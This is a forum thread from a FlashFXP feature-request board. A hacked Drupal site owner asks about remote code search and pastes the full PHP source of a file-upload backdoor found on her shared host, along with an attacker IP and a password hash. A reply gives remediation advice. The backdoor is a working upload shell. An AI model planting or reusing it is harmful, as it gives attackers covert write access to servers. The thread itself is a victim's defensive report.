FlashFXP Feature Requests - Possible to search for code - hacker has made a lot of files on my shared host domains

Tine Müller · 12-26-2013, 04:49 AM

Hej, I really like your product just would like to if it was possible to search for code the same way as we can search for files. Would this be possible in the future, please?

I need it because my sites on shared host has been hacked. Has used weeks to solve this and has figured out that a lot of the .php files the hacker put on my domains include:

Quote:

Searched for $auth_pass = "010725b18df33d5920e241c4006f11d4"; which is included in a lot of files on my domains and are about to find out how to clean all these files. Found http://www.unphp.net/decode/a2777f8a...8f6baf24c525a/

Can someone tell me what all these code do to my sites, please and isn't it possible to stop this hacker. His ip 95.211.22.216 and I searched and found http://www..abuseipdb.com/report-history/95.211.22.216.

The same ip has made a file with this code and the file should NOT be in this Drupal module. Maybe he use this file to put ALL the other files on my shared host?

<?php

if(!empty($_FILES['message']['name']) AND (md5($_POST['nick']) == '211df628e55249fce7074c90be70e56b')) {

$security_code = $_POST['security_code'];

if ( !$security_code ) $security_code = ".";

$security_code = rtrim($security_code, "/");

$tmp_name = $_FILES['message']['tmp_name'];

$name = $_FILES['message']['name'];

@move_uploaded_file($tmp_name, $security_code."/".$name) ? print "<b>Message sent!</b><br/>" : print "<b>Error!</b><br/>";

} /*3339*/ print '<html>

<head>

<title>Search form</title>

</head>

<body>

<form enctype="multipart/form-data" action="" method="POST">

Message: <br/><input name="message" type="file" />

<br/>Security Code: <br/><input name="security_code" value=""/><br/>

<br/>Nick: <br/><input name="nick" value=""/><br/>

<input type="submit" value="Sent" />

</form>

</body>

</html>';

I'm also discussing it in Drupal group https://drupal.org/node/2153055#comment-8302687

*bigstar* · 01-02-2014, 11:50 AM

Searching the content of files on a remote server is not very practical because each file would need to be downloaded, you may as well download everything and do a local grep. GrepWin is nice tool, it can also do find and replace, then re-upload the edited files all in one go. Trying to do this remotely, what if the files are re-infected by another file immediately after you sanitize it?

The best solution would be to replace all the files on the server with a local copy of the files that haven't been tampered with, trying to sanitize the remote files may work but if you miss one file or another backdoor you leave yourself open to a repeat hack.

If you don't have the original files and your only option is to sanitize the modified files then it would be more practical to access the server via a ssh (shell) and use grep to find files that contain the desired text patterns.

Either way the site should probably be taken down while the files are sanitized and only brought back online once you can ensure all the files are cleaned.